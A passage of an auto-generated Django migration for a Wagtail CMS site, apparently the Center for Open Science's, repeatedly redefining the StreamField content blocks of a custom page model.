wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StreamBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsor', 'sponsor'), ('partner', 'partner')], default='sponsor')),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='organization',
name='name',
field=models.CharField(max_length=255, unique=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.URLBlock(max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.RichTextBlock(required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', 